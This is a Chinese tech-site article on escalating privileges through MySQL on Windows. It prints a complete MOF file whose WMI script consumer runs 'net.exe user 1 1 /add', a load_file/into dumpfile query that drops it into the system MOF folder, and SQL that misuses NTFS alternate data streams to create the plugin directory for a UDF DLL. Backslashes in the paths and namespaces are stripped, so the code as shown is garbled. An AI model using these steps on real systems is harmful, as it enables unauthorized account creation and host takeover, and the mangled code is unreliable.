知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 安全资讯

MYSQL提权细节

发布时间:2014-04-28 12:39:46作者:知识屋

 一.mof 提权

1、找一个可写目录上传mof文件

 
01	#pragma namespace(".rootsubscription")
02	 
03	instance of __EventFilter as $EventFilter
04	{
05	    EventNamespace = "RootCimv2";
06	    Name  = "filtP2";
07	    Query = "Select * From __InstanceModificationEvent "
08	            "Where TargetInstance Isa "Win32_LocalTime" "
09	            "And TargetInstance.Second = 5";
10	    QueryLanguage = "WQL";
11	};
12	 
13	instance of ActiveScriptEventConsumer as $Consumer
14	{
15	    Name = "consPCSV2";
16	    ScriptingEngine = "JScript";
17	    ScriptText =
18	    "var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user 1 1 /add")";
19	};
20	 
21	instance of __FilterToConsumerBinding
22	{
23	    Consumer   = $Consumer;
24	    Filter = $EventFilter;
25	};

 

2、执行load_file或into dumpfile把文件导出到正确的位置

1 select load_file('C:/wmpub/.mof') into dumpfile 'c://system32/wbem/mof/mysql.mof'

二 . UDF Can't open shared library

    某些情况下,我们会遇到Can't open shared library的情况,这时就需要我们把udf.dll导出到libplugin目录下才可以,但是默认情况下plugin不存在

    大牛研究出了利用NTFS ADS流来创建文件夹的方法

 
1	select @@basedir;  
2	//查找mysql的目录
3	select 'It is dll'into dumpfile 'C:Program FilesMySQLMySQL Server 5.1lib::$INDEX_ALLOCATION';  
4	//利用NTFS ADS创建lib目录
5	select 'It is dll'into dumpfile 'C:Program FilesMySQLMySQL Server 5.1libplugin::$INDEX_ALLOCATION';
6	//利用NTFS ADS创建plugin目录

成功以后再进行导出

 

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜